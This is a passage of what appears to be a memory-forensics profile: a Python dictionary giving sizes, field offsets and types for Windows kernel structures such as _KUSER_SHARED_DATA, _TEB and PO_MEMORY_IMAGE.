'CounterMask' : [ 0x0, ['unsigned long long']],
'InstanceMask' : [ 0x8, ['pointer', ['_UNICODE_STRING']]],
} ],
'_DUMP_STACK_CONTEXT' : [ 0xb0, {
'Init' : [ 0x0, ['_DUMP_INITIALIZATION_CONTEXT']],
'PartitionOffset' : [ 0x70, ['_LARGE_INTEGER']],
'DumpPointers' : [ 0x78, ['pointer', ['void']]],
'PointersLength' : [ 0x7c, ['unsigned long']],
'ModulePrefix' : [ 0x80, ['pointer', ['unsigned short']]],
'DriverList' : [ 0x84, ['_LIST_ENTRY']],
'InitMsg' : [ 0x8c, ['_STRING']],
'ProgMsg' : [ 0x94, ['_STRING']],
'DoneMsg' : [ 0x9c, ['_STRING']],
'FileObject' : [ 0xa4, ['pointer', ['void']]],
'UsageType' : [ 0xa8, ['Enumeration', dict(target = 'long', choices = {0: 'DeviceUsageTypeUndefined', 1: 'DeviceUsageTypePaging', 2: 'DeviceUsageTypeHibernation', 3: 'DeviceUsageTypeDumpFile'})]],
} ],
'_FILE_STANDARD_INFORMATION' : [ 0x18, {
'AllocationSize' : [ 0x0, ['_LARGE_INTEGER']],
'EndOfFile' : [ 0x8, ['_LARGE_INTEGER']],
'NumberOfLinks' : [ 0x10, ['unsigned long']],
'DeletePending' : [ 0x14, ['unsigned char']],
'Directory' : [ 0x15, ['unsigned char']],
} ],
'_POP_SHUTDOWN_BUG_CHECK' : [ 0x20, {
'ThreadHandle' : [ 0x0, ['pointer', ['void']]],
'ThreadId' : [ 0x4, ['pointer', ['void']]],
'ProcessId' : [ 0x8, ['pointer', ['void']]],
'Code' : [ 0xc, ['unsigned long']],
'Parameter1' : [ 0x10, ['unsigned long']],
'Parameter2' : [ 0x14, ['unsigned long']],
'Parameter3' : [ 0x18, ['unsigned long']],
'Parameter4' : [ 0x1c, ['unsigned long']],
} ],
'_MI_EXTRA_IMAGE_INFORMATION' : [ 0x8, {
'SizeOfHeaders' : [ 0x0, ['unsigned long']],
'SizeOfImage' : [ 0x4, ['unsigned long']],
} ],
'_PCW_MASK_INFORMATION' : [ 0x20, {
'CounterMask' : [ 0x0, ['unsigned long long']],
'InstanceMask' : [ 0x8, ['pointer', ['_UNICODE_STRING']]],
'InstanceId' : [ 0xc, ['unsigned long']],
'CollectMultiple' : [ 0x10, ['unsigned char']],
'Buffer' : [ 0x14, ['pointer', ['_PCW_BUFFER']]],
'CancelEvent' : [ 0x18, ['pointer', ['_KEVENT']]],
} ],
'_RTL_HANDLE_TABLE_ENTRY' : [ 0x4, {
'Flags' : [ 0x0, ['unsigned long']],
'NextFree' : [ 0x0, ['pointer', ['_RTL_HANDLE_TABLE_ENTRY']]],
} ],
'__unnamed_230b' : [ 0x10, {
'TestAllocation' : [ 0x0, ['_ARBITER_TEST_ALLOCATION_PARAMETERS']],
'RetestAllocation' : [ 0x0, ['_ARBITER_RETEST_ALLOCATION_PARAMETERS']],
'BootAllocation' : [ 0x0, ['_ARBITER_BOOT_ALLOCATION_PARAMETERS']],
'QueryAllocatedResources' : [ 0x0, ['_ARBITER_QUERY_ALLOCATED_RESOURCES_PARAMETERS']],
'QueryConflict' : [ 0x0, ['_ARBITER_QUERY_CONFLICT_PARAMETERS']],
'QueryArbitrate' : [ 0x0, ['_ARBITER_QUERY_ARBITRATE_PARAMETERS']],
'AddReserved' : [ 0x0, ['_ARBITER_ADD_RESERVED_PARAMETERS']],
} ],
'_ARBITER_PARAMETERS' : [ 0x10, {
'Parameters' : [ 0x0, ['__unnamed_230b']],
} ],
'__unnamed_230f' : [ 0x8, {
'idxRecord' : [ 0x0, ['unsigned long']],
'cidContainer' : [ 0x4, ['unsigned long']],
} ],
'_CLS_LSN' : [ 0x8, {
'offset' : [ 0x0, ['__unnamed_230f']],
'ullOffset' : [ 0x0, ['unsigned long long']],
} ],
'POWER_ACTION_POLICY' : [ 0xc, {
'Action' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PowerActionNone', 1: 'PowerActionReserved', 2: 'PowerActionSleep', 3: 'PowerActionHibernate', 4: 'PowerActionShutdown', 5: 'PowerActionShutdownReset', 6: 'PowerActionShutdownOff', 7: 'PowerActionWarmEject'})]],
'Flags' : [ 0x4, ['unsigned long']],
'EventCode' : [ 0x8, ['unsigned long']],
} ],
'PO_MEMORY_IMAGE' : [ 0xe0, {
'Signature' : [ 0x0, ['unsigned long']],
'ImageType' : [ 0x4, ['unsigned long']],
'CheckSum' : [ 0x8, ['unsigned long']],
'LengthSelf' : [ 0xc, ['unsigned long']],
'PageSelf' : [ 0x10, ['unsigned long']],
'PageSize' : [ 0x14, ['unsigned long']],
'SystemTime' : [ 0x18, ['_LARGE_INTEGER']],
'InterruptTime' : [ 0x20, ['unsigned long long']],
'FeatureFlags' : [ 0x28, ['unsigned long']],
'HiberFlags' : [ 0x2c, ['unsigned char']],
'spare' : [ 0x2d, ['array', 3, ['unsigned char']]],
'NoHiberPtes' : [ 0x30, ['unsigned long']],
'HiberVa' : [ 0x34, ['unsigned long']],
'HiberPte' : [ 0x38, ['_LARGE_INTEGER']],
'NoFreePages' : [ 0x40, ['unsigned long']],
'FreeMapCheck' : [ 0x44, ['unsigned long']],
'WakeCheck' : [ 0x48, ['unsigned long']],
'FirstTablePage' : [ 0x4c, ['unsigned long']],
'PerfInfo' : [ 0x50, ['_PO_HIBER_PERF']],
'FirmwareRuntimeInformationPages' : [ 0xa8, ['unsigned long']],
'FirmwareRuntimeInformation' : [ 0xac, ['array', 1, ['unsigned long']]],
'NoBootLoaderLogPages' : [ 0xb0, ['unsigned long']],
'BootLoaderLogPages' : [ 0xb4, ['array', 8, ['unsigned long']]],
'NotUsed' : [ 0xd4, ['unsigned long']],
'ResumeContextCheck' : [ 0xd8, ['unsigned long']],
'ResumeContextPages' : [ 0xdc, ['unsigned long']],
} ],
'EX_QUEUE_WORKER_INFO' : [ 0x4, {
'QueueDisabled' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'MakeThreadsAsNecessary' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'WaitMode' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'WorkerCount' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
'QueueWorkerInfo' : [ 0x0, ['long']],
} ],
'BATTERY_REPORTING_SCALE' : [ 0x8, {
'Granularity' : [ 0x0, ['unsigned long']],
'Capacity' : [ 0x4, ['unsigned long']],
} ],
'_CURDIR' : [ 0xc, {
'DosPath' : [ 0x0, ['_UNICODE_STRING']],
'Handle' : [ 0x8, ['pointer', ['void']]],
} ],
'_PO_HIBER_PERF' : [ 0x58, {
'IoTicks' : [ 0x0, ['unsigned long long']],
'InitTicks' : [ 0x8, ['unsigned long long']],
'CopyTicks' : [ 0x10, ['unsigned long long']],
'ElapsedTicks' : [ 0x18, ['unsigned long long']],
'CompressTicks' : [ 0x20, ['unsigned long long']],
'ResumeAppTime' : [ 0x28, ['unsigned long long']],
'HiberFileResumeTime' : [ 0x30, ['unsigned long long']],
'BytesCopied' : [ 0x38, ['unsigned long long']],
'PagesProcessed' : [ 0x40, ['unsigned long long']],
'PagesWritten' : [ 0x48, ['unsigned long']],
'DumpCount' : [ 0x4c, ['unsigned long']],
'FileRuns' : [ 0x50, ['unsigned long']],
} ],
'_DEVICE_FLAGS' : [ 0x4, {
'Failed' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ReadOnly' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Removable' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ConsoleIn' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'ConsoleOut' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Input' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Output' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
} ],
'_RTL_BALANCED_LINKS' : [ 0x10, {
'Parent' : [ 0x0, ['pointer', ['_RTL_BALANCED_LINKS']]],
'LeftChild' : [ 0x4, ['pointer', ['_RTL_BALANCED_LINKS']]],
'RightChild' : [ 0x8, ['pointer', ['_RTL_BALANCED_LINKS']]],
'Balance' : [ 0xc, ['unsigned char']],
'Reserved' : [ 0xd, ['array', 3, ['unsigned char']]],
} ],
'_MMVIEW' : [ 0x18, {
'Entry' : [ 0x0, ['unsigned long']],
'Writable' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ControlArea' : [ 0x4, ['pointer', ['_CONTROL_AREA']]],
'ViewLinks' : [ 0x8, ['_LIST_ENTRY']],
'SessionViewVa' : [ 0x10, ['pointer', ['void']]],
'SessionId' : [ 0x14, ['unsigned long']],
} ],
'_MM_SESSION_SPACE_FLAGS' : [ 0x4, {
'Initialized' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'DeletePending' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'PoolInitialized' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'DynamicVaInitialized' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'WsInitialized' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'PoolDestroyed' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'ObjectInitialized' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'Filler' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 32, native_type='unsigned long')]],
} ],
'_HEADLESS_LOADER_BLOCK' : [ 0x34, {
'UsedBiosSettings' : [ 0x0, ['unsigned char']],
'DataBits' : [ 0x1, ['unsigned char']],
'StopBits' : [ 0x2, ['unsigned char']],
'Parity' : [ 0x3, ['unsigned char']],
'BaudRate' : [ 0x4, ['unsigned long']],
'PortNumber' : [ 0x8, ['unsigned long']],
'PortAddress' : [ 0xc, ['pointer', ['unsigned char']]],
'PciDeviceId' : [ 0x10, ['unsigned short']],
'PciVendorId' : [ 0x12, ['unsigned short']],
'PciBusNumber' : [ 0x14, ['unsigned char']],
'PciBusSegment' : [ 0x16, ['unsigned short']],
'PciSlotNumber' : [ 0x18, ['unsigned char']],
'PciFunctionNumber' : [ 0x19, ['unsigned char']],
'PciFlags' : [ 0x1c, ['unsigned long']],
'SystemGUID' : [ 0x20, ['_GUID']],
'IsMMIODevice' : [ 0x30, ['unsigned char']],
'TerminalType' : [ 0x31, ['unsigned char']],
} ],
'__unnamed_2337' : [ 0x8, {
'Signature' : [ 0x0, ['unsigned long']],
'CheckSum' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_2339' : [ 0x10, {
'DiskId' : [ 0x0, ['_GUID']],
} ],
'__unnamed_233b' : [ 0x10, {
'Mbr' : [ 0x0, ['__unnamed_2337']],
'Gpt' : [ 0x0, ['__unnamed_2339']],
} ],
'_DUMP_INITIALIZATION_CONTEXT' : [ 0x70, {
'Length' : [ 0x0, ['unsigned long']],
'Reserved' : [ 0x4, ['unsigned long']],
'MemoryBlock' : [ 0x8, ['pointer', ['void']]],
'CommonBuffer' : [ 0xc, ['array', 2, ['pointer', ['void']]]],
'PhysicalAddress' : [ 0x18, ['array', 2, ['_LARGE_INTEGER']]],
'StallRoutine' : [ 0x28, ['pointer', ['void']]],
'OpenRoutine' : [ 0x2c, ['pointer', ['void']]],
'WriteRoutine' : [ 0x30, ['pointer', ['void']]],
'FinishRoutine' : [ 0x34, ['pointer', ['void']]],
'AdapterObject' : [ 0x38, ['pointer', ['_ADAPTER_OBJECT']]],
'MappedRegisterBase' : [ 0x3c, ['pointer', ['void']]],
'PortConfiguration' : [ 0x40, ['pointer', ['void']]],
'CrashDump' : [ 0x44, ['unsigned char']],
'MaximumTransferSize' : [ 0x48, ['unsigned long']],
'CommonBufferSize' : [ 0x4c, ['unsigned long']],
'TargetAddress' : [ 0x50, ['pointer', ['void']]],
'WritePendingRoutine' : [ 0x54, ['pointer', ['void']]],
'PartitionStyle' : [ 0x58, ['unsigned long']],
'DiskInfo' : [ 0x5c, ['__unnamed_233b']],
} ],
'_MI_SYSTEM_PTE_TYPE' : [ 0x30, {
'Bitmap' : [ 0x0, ['_RTL_BITMAP']],
'Flags' : [ 0x8, ['unsigned long']],
'Hint' : [ 0xc, ['unsigned long']],
'BasePte' : [ 0x10, ['pointer', ['_MMPTE']]],
'FailureCount' : [ 0x14, ['pointer', ['unsigned long']]],
'Vm' : [ 0x18, ['pointer', ['_MMSUPPORT']]],
'TotalSystemPtes' : [ 0x1c, ['long']],
'TotalFreeSystemPtes' : [ 0x20, ['long']],
'CachedPteCount' : [ 0x24, ['long']],
'PteFailures' : [ 0x28, ['unsigned long']],
'SpinLock' : [ 0x2c, ['unsigned long']],
'GlobalMutex' : [ 0x2c, ['pointer', ['_KGUARDED_MUTEX']]],
} ],
'_NETWORK_LOADER_BLOCK' : [ 0x10, {
'DHCPServerACK' : [ 0x0, ['pointer', ['unsigned char']]],
'DHCPServerACKLength' : [ 0x4, ['unsigned long']],
'BootServerReplyPacket' : [ 0x8, ['pointer', ['unsigned char']]],
'BootServerReplyPacketLength' : [ 0xc, ['unsigned long']],
} ],
'_CM_KEY_SECURITY' : [ 0x28, {
'Signature' : [ 0x0, ['unsigned short']],
'Reserved' : [ 0x2, ['unsigned short']],
'Flink' : [ 0x4, ['unsigned long']],
'Blink' : [ 0x8, ['unsigned long']],
'ReferenceCount' : [ 0xc, ['unsigned long']],
'DescriptorLength' : [ 0x10, ['unsigned long']],
'Descriptor' : [ 0x14, ['_SECURITY_DESCRIPTOR_RELATIVE']],
} ],
'_PO_DEVICE_NOTIFY_ORDER' : [ 0x170, {
'Locked' : [ 0x0, ['unsigned char']],
'WarmEjectPdoPointer' : [ 0x4, ['pointer', ['pointer', ['_DEVICE_OBJECT']]]],
'OrderLevel' : [ 0x8, ['array', 9, ['_PO_NOTIFY_ORDER_LEVEL']]],
} ],
'_ARBITER_CONFLICT_INFO' : [ 0x18, {
'OwningObject' : [ 0x0, ['pointer', ['_DEVICE_OBJECT']]],
'Start' : [ 0x8, ['unsigned long long']],
'End' : [ 0x10, ['unsigned long long']],
} ],
'_PO_NOTIFY_ORDER_LEVEL' : [ 0x28, {
'DeviceCount' : [ 0x0, ['unsigned long']],
'ActiveCount' : [ 0x4, ['unsigned long']],
'WaitSleep' : [ 0x8, ['_LIST_ENTRY']],
'ReadySleep' : [ 0x10, ['_LIST_ENTRY']],
'ReadyS0' : [ 0x18, ['_LIST_ENTRY']],
'WaitS0' : [ 0x20, ['_LIST_ENTRY']],
} ],
'_THREAD_PERFORMANCE_DATA' : [ 0x1c0, {
'Size' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned short']],
'ProcessorNumber' : [ 0x4, ['_PROCESSOR_NUMBER']],
'ContextSwitches' : [ 0x8, ['unsigned long']],
'HwCountersCount' : [ 0xc, ['unsigned long']],
'UpdateCount' : [ 0x10, ['unsigned long long']],
'WaitReasonBitMap' : [ 0x18, ['unsigned long long']],
'HardwareCounters' : [ 0x20, ['unsigned long long']],
'CycleTime' : [ 0x28, ['_COUNTER_READING']],
'HwCounters' : [ 0x40, ['array', 16, ['_COUNTER_READING']]],
} ],
'_ETW_REPLY_QUEUE' : [ 0x2c, {
'Queue' : [ 0x0, ['_KQUEUE']],
'EventsLost' : [ 0x28, ['long']],
} ],
'_ARBITER_QUERY_ALLOCATED_RESOURCES_PARAMETERS' : [ 0x4, {
'AllocatedResources' : [ 0x0, ['pointer', ['pointer', ['_CM_PARTIAL_RESOURCE_LIST']]]],
} ],
'_KSPECIAL_REGISTERS' : [ 0x54, {
'Cr0' : [ 0x0, ['unsigned long']],
'Cr2' : [ 0x4, ['unsigned long']],
'Cr3' : [ 0x8, ['unsigned long']],
'Cr4' : [ 0xc, ['unsigned long']],
'KernelDr0' : [ 0x10, ['unsigned long']],
'KernelDr1' : [ 0x14, ['unsigned long']],
'KernelDr2' : [ 0x18, ['unsigned long']],
'KernelDr3' : [ 0x1c, ['unsigned long']],
'KernelDr6' : [ 0x20, ['unsigned long']],
'KernelDr7' : [ 0x24, ['unsigned long']],
'Gdtr' : [ 0x28, ['_DESCRIPTOR']],
'Idtr' : [ 0x30, ['_DESCRIPTOR']],
'Tr' : [ 0x38, ['unsigned short']],
'Ldtr' : [ 0x3a, ['unsigned short']],
'Reserved' : [ 0x3c, ['array', 6, ['unsigned long']]],
} ],
'_RTL_ACTIVATION_CONTEXT_STACK_FRAME' : [ 0xc, {
'Previous' : [ 0x0, ['pointer', ['_RTL_ACTIVATION_CONTEXT_STACK_FRAME']]],
'ActivationContext' : [ 0x4, ['pointer', ['_ACTIVATION_CONTEXT']]],
'Flags' : [ 0x8, ['unsigned long']],
} ],
'_ARBITER_ORDERING' : [ 0x10, {
'Start' : [ 0x0, ['unsigned long long']],
'End' : [ 0x8, ['unsigned long long']],
} ],
'_RTL_AVL_TABLE' : [ 0x38, {
'BalancedRoot' : [ 0x0, ['_RTL_BALANCED_LINKS']],
'OrderedPointer' : [ 0x10, ['pointer', ['void']]],
'WhichOrderedElement' : [ 0x14, ['unsigned long']],
'NumberGenericTableElements' : [ 0x18, ['unsigned long']],
'DepthOfTree' : [ 0x1c, ['unsigned long']],
'RestartKey' : [ 0x20, ['pointer', ['_RTL_BALANCED_LINKS']]],
'DeleteCount' : [ 0x24, ['unsigned long']],
'CompareRoutine' : [ 0x28, ['pointer', ['void']]],
'AllocateRoutine' : [ 0x2c, ['pointer', ['void']]],
'FreeRoutine' : [ 0x30, ['pointer', ['void']]],
'TableContext' : [ 0x34, ['pointer', ['void']]],
} ],
'_KTRANSACTION_HISTORY' : [ 0x8, {
'RecordType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {1: 'KTMOH_CommitTransaction_Result', 2: 'KTMOH_RollbackTransaction_Result'})]],
'Payload' : [ 0x4, ['unsigned long']],
} ],
'_DESCRIPTOR' : [ 0x8, {
'Pad' : [ 0x0, ['unsigned short']],
'Limit' : [ 0x2, ['unsigned short']],
'Base' : [ 0x4, ['unsigned long']],
} ],
'LIST_ENTRY64' : [ 0x10, {
'Flink' : [ 0x0, ['unsigned long long']],
'Blink' : [ 0x8, ['unsigned long long']],
} ],
'LIST_ENTRY32' : [ 0x8, {
'Flink' : [ 0x0, ['unsigned long']],
'Blink' : [ 0x4, ['unsigned long']],
} ],
'_KSYSTEM_TIME' : [ 0xc, {
'LowPart' : [ 0x0, ['unsigned long']],
'High1Time' : [ 0x4, ['long']],
'High2Time' : [ 0x8, ['long']],
} ],
'_KUSER_SHARED_DATA' : [ 0x5f0, {
'TickCountLowDeprecated' : [ 0x0, ['unsigned long']],
'TickCountMultiplier' : [ 0x4, ['unsigned long']],
'InterruptTime' : [ 0x8, ['_KSYSTEM_TIME']],
'SystemTime' : [ 0x14, ['_KSYSTEM_TIME']],
'TimeZoneBias' : [ 0x20, ['_KSYSTEM_TIME']],
'ImageNumberLow' : [ 0x2c, ['unsigned short']],
'ImageNumberHigh' : [ 0x2e, ['unsigned short']],
'NtSystemRoot' : [ 0x30, ['array', 260, ['wchar']]],
'MaxStackTraceDepth' : [ 0x238, ['unsigned long']],
'CryptoExponent' : [ 0x23c, ['unsigned long']],
'TimeZoneId' : [ 0x240, ['unsigned long']],
'LargePageMinimum' : [ 0x244, ['unsigned long']],
'Reserved2' : [ 0x248, ['array', 7, ['unsigned long']]],
'NtProductType' : [ 0x264, ['Enumeration', dict(target = 'long', choices = {1: 'NtProductWinNt', 2: 'NtProductLanManNt', 3: 'NtProductServer'})]],
'ProductTypeIsValid' : [ 0x268, ['unsigned char']],
'NtMajorVersion' : [ 0x26c, ['unsigned long']],
'NtMinorVersion' : [ 0x270, ['unsigned long']],
'ProcessorFeatures' : [ 0x274, ['array', 64, ['unsigned char']]],
'Reserved1' : [ 0x2b4, ['unsigned long']],
'Reserved3' : [ 0x2b8, ['unsigned long']],
'TimeSlip' : [ 0x2bc, ['unsigned long']],
'AlternativeArchitecture' : [ 0x2c0, ['Enumeration', dict(target = 'long', choices = {0: 'StandardDesign', 1: 'NEC98x86', 2: 'EndAlternatives'})]],
'AltArchitecturePad' : [ 0x2c4, ['array', 1, ['unsigned long']]],
'SystemExpirationDate' : [ 0x2c8, ['_LARGE_INTEGER']],
'SuiteMask' : [ 0x2d0, ['unsigned long']],
'KdDebuggerEnabled' : [ 0x2d4, ['unsigned char']],
'NXSupportPolicy' : [ 0x2d5, ['unsigned char']],
'ActiveConsoleId' : [ 0x2d8, ['unsigned long']],
'DismountCount' : [ 0x2dc, ['unsigned long']],
'ComPlusPackage' : [ 0x2e0, ['unsigned long']],
'LastSystemRITEventTickCount' : [ 0x2e4, ['unsigned long']],
'NumberOfPhysicalPages' : [ 0x2e8, ['unsigned long']],
'SafeBootMode' : [ 0x2ec, ['unsigned char']],
'TscQpcData' : [ 0x2ed, ['unsigned char']],
'TscQpcEnabled' : [ 0x2ed, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'TscQpcSpareFlag' : [ 0x2ed, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'TscQpcShift' : [ 0x2ed, ['BitField', dict(start_bit = 2, end_bit = 8, native_type='unsigned char')]],
'TscQpcPad' : [ 0x2ee, ['array', 2, ['unsigned char']]],
'SharedDataFlags' : [ 0x2f0, ['unsigned long']],
'DbgErrorPortPresent' : [ 0x2f0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'DbgElevationEnabled' : [ 0x2f0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'DbgVirtEnabled' : [ 0x2f0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'DbgInstallerDetectEnabled' : [ 0x2f0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'DbgSystemDllRelocated' : [ 0x2f0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'DbgDynProcessorEnabled' : [ 0x2f0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'DbgSEHValidationEnabled' : [ 0x2f0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'SpareBits' : [ 0x2f0, ['BitField', dict(start_bit = 7, end_bit = 32, native_type='unsigned long')]],
'DataFlagsPad' : [ 0x2f4, ['array', 1, ['unsigned long']]],
'TestRetInstruction' : [ 0x2f8, ['unsigned long long']],
'SystemCall' : [ 0x300, ['unsigned long']],
'SystemCallReturn' : [ 0x304, ['unsigned long']],
'SystemCallPad' : [ 0x308, ['array', 3, ['unsigned long long']]],
'TickCount' : [ 0x320, ['_KSYSTEM_TIME']],
'TickCountQuad' : [ 0x320, ['unsigned long long']],
'ReservedTickCountOverlay' : [ 0x320, ['array', 3, ['unsigned long']]],
'TickCountPad' : [ 0x32c, ['array', 1, ['unsigned long']]],
'Cookie' : [ 0x330, ['unsigned long']],
'CookiePad' : [ 0x334, ['array', 1, ['unsigned long']]],
'ConsoleSessionForegroundProcessId' : [ 0x338, ['long long']],
'Wow64SharedInformation' : [ 0x340, ['array', 16, ['unsigned long']]],
'UserModeGlobalLogger' : [ 0x380, ['array', 16, ['unsigned short']]],
'ImageFileExecutionOptions' : [ 0x3a0, ['unsigned long']],
'LangGenerationCount' : [ 0x3a4, ['unsigned long']],
'Reserved5' : [ 0x3a8, ['unsigned long long']],
'InterruptTimeBias' : [ 0x3b0, ['unsigned long long']],
'TscQpcBias' : [ 0x3b8, ['unsigned long long']],
'ActiveProcessorCount' : [ 0x3c0, ['unsigned long']],
'ActiveGroupCount' : [ 0x3c4, ['unsigned short']],
'Reserved4' : [ 0x3c6, ['unsigned short']],
'AitSamplingValue' : [ 0x3c8, ['unsigned long']],
'AppCompatFlag' : [ 0x3cc, ['unsigned long']],
'SystemDllNativeRelocation' : [ 0x3d0, ['unsigned long long']],
'SystemDllWowRelocation' : [ 0x3d8, ['unsigned long']],
'XStatePad' : [ 0x3dc, ['array', 1, ['unsigned long']]],
'XState' : [ 0x3e0, ['_XSTATE_CONFIGURATION']],
} ],
'__unnamed_1041' : [ 0x8, {
'LowPart' : [ 0x0, ['unsigned long']],
'HighPart' : [ 0x4, ['unsigned long']],
} ],
'_ULARGE_INTEGER' : [ 0x8, {
'LowPart' : [ 0x0, ['unsigned long']],
'HighPart' : [ 0x4, ['unsigned long']],
'u' : [ 0x0, ['__unnamed_1041']],
'QuadPart' : [ 0x0, ['unsigned long long']],
} ],
'__unnamed_1045' : [ 0x8, {
'LowPart' : [ 0x0, ['unsigned long']],
'HighPart' : [ 0x4, ['long']],
} ],
'_LARGE_INTEGER' : [ 0x8, {
'LowPart' : [ 0x0, ['unsigned long']],
'HighPart' : [ 0x4, ['long']],
'u' : [ 0x0, ['__unnamed_1045']],
'QuadPart' : [ 0x0, ['long long']],
} ],
'__unnamed_105e' : [ 0x4, {
'LongFunction' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Persistent' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Private' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 32, native_type='unsigned long')]],
} ],
'__unnamed_1060' : [ 0x4, {
'Flags' : [ 0x0, ['unsigned long']],
's' : [ 0x0, ['__unnamed_105e']],
} ],
'_TP_CALLBACK_ENVIRON_V3' : [ 0x28, {
'Version' : [ 0x0, ['unsigned long']],
'Pool' : [ 0x4, ['pointer', ['_TP_POOL']]],
'CleanupGroup' : [ 0x8, ['pointer', ['_TP_CLEANUP_GROUP']]],
'CleanupGroupCancelCallback' : [ 0xc, ['pointer', ['void']]],
'RaceDll' : [ 0x10, ['pointer', ['void']]],
'ActivationContext' : [ 0x14, ['pointer', ['_ACTIVATION_CONTEXT']]],
'FinalizationCallback' : [ 0x18, ['pointer', ['void']]],
'u' : [ 0x1c, ['__unnamed_1060']],
'CallbackPriority' : [ 0x20, ['Enumeration', dict(target = 'long', choices = {0: 'TP_CALLBACK_PRIORITY_HIGH', 1: 'TP_CALLBACK_PRIORITY_NORMAL', 2: 'TP_CALLBACK_PRIORITY_LOW', 3: 'TP_CALLBACK_PRIORITY_INVALID'})]],
'Size' : [ 0x24, ['unsigned long']],
} ],
'_TP_TASK' : [ 0x20, {
'Callbacks' : [ 0x0, ['pointer', ['_TP_TASK_CALLBACKS']]],
'NumaNode' : [ 0x4, ['unsigned long']],
'IdealProcessor' : [ 0x8, ['unsigned char']],
'PostGuard' : [ 0xc, ['_TP_NBQ_GUARD']],
'NBQNode' : [ 0x1c, ['pointer', ['void']]],
} ],
'_TP_TASK_CALLBACKS' : [ 0x8, {
'ExecuteCallback' : [ 0x0, ['pointer', ['void']]],
'Unposted' : [ 0x4, ['pointer', ['void']]],
} ],
'_TP_DIRECT' : [ 0xc, {
'Callback' : [ 0x0, ['pointer', ['void']]],
'NumaNode' : [ 0x4, ['unsigned long']],
'IdealProcessor' : [ 0x8, ['unsigned char']],
} ],
'_TEB' : [ 0xfe4, {
'NtTib' : [ 0x0, ['_NT_TIB']],
'EnvironmentPointer' : [ 0x1c, ['pointer', ['void']]],
'ClientId' : [ 0x20, ['_CLIENT_ID']],
'ActiveRpcHandle' : [ 0x28, ['pointer', ['void']]],
'ThreadLocalStoragePointer' : [ 0x2c, ['pointer', ['void']]],
'ProcessEnvironmentBlock' : [ 0x30, ['pointer', ['_PEB']]],
'LastErrorValue' : [ 0x34, ['unsigned long']],
'CountOfOwnedCriticalSections' : [ 0x38, ['unsigned long']],
'CsrClientThread' : [ 0x3c, ['pointer', ['void']]],
'Win32ThreadInfo' : [ 0x40, ['pointer', ['void']]],
'User32Reserved' : [ 0x44, ['array', 26, ['unsigned long']]],
'UserReserved' : [ 0xac, ['array', 5, ['unsigned long']]],
'WOW32Reserved' : [ 0xc0, ['pointer', ['void']]],
'CurrentLocale' : [ 0xc4, ['unsigned long']],
'FpSoftwareStatusRegister' : [ 0xc8, ['unsigned long']],
'SystemReserved1' : [ 0xcc, ['array', 54, ['pointer', ['void']]]],
'ExceptionCode' : [ 0x1a4, ['long']],
'ActivationContextStackPointer' : [ 0x1a8, ['pointer', ['_ACTIVATION_CONTEXT_STACK']]],
'SpareBytes' : [ 0x1ac, ['array', 36, ['unsigned char']]],
'TxFsContext' : [ 0x1d0, ['unsigned long']],
'GdiTebBatch' : [ 0x1d4, ['_GDI_TEB_BATCH']],
'RealClientId' : [ 0x6b4, ['_CLIENT_ID']],
'GdiCachedProcessHandle' : [ 0x6bc, ['pointer', ['void']]],
'GdiClientPID' : [ 0x6c0, ['unsigned long']],
'GdiClientTID' : [ 0x6c4, ['unsigned long']],
'GdiThreadLocalInfo' : [ 0x6c8, ['pointer', ['void']]],
'Win32ClientInfo' : [ 0x6cc, ['array', 62, ['unsigned long']]],
'glDispatchTable' : [ 0x7c4, ['array', 233, ['pointer', ['void']]]],
'glReserved1' : [ 0xb68, ['array', 29, ['unsigned long']]],
'glReserved2' : [ 0xbdc, ['pointer', ['void']]],
'glSectionInfo' : [ 0xbe0, ['pointer', ['void']]],
'glSection' : [ 0xbe4, ['pointer', ['void']]],
'glTable' : [ 0xbe8, ['pointer', ['void']]],
